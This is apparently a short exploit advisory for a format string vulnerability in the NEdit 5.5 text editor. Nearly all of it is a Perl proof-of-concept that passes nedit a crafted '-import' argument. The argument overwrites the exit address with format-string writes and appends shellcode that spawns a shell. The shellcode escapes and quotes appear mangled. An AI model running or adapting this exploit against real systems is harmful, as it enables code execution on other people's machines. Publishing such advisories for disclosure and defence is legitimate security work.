NEdit 5.5 Format String Exploit

Summary

NEdit 5.5 suffers from Format String Vulnerability.

Credit:

The information has been provided by Tosh.


Details

Vulnerable Systems:
 * NEdit 5.5 Format

#!/usr/bin/perl -w

use strict;

my $exit_addr = 0x0815a86c;

my $sc =
‘x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50’.
‘x54x53xb0x3bx50xcdx80’;

my (@payload) = (‘./nedit’, ‘-import’,
pack(‘L’,$exit_addr).pack(‘L’,$exit_addr+1).pack(‘L’,$exit_addr+2).pack(‘L’,$exit_addr+3).

‘%1021$.8x-‘.’%1$127x%1021$n%1$083x%1022$n%1$212x%1023$n%1$256x%1024$n’
. $sc);

exec(@payload);

Disclosure Timeline:
Published: 2011-04-14

Categories: Exploits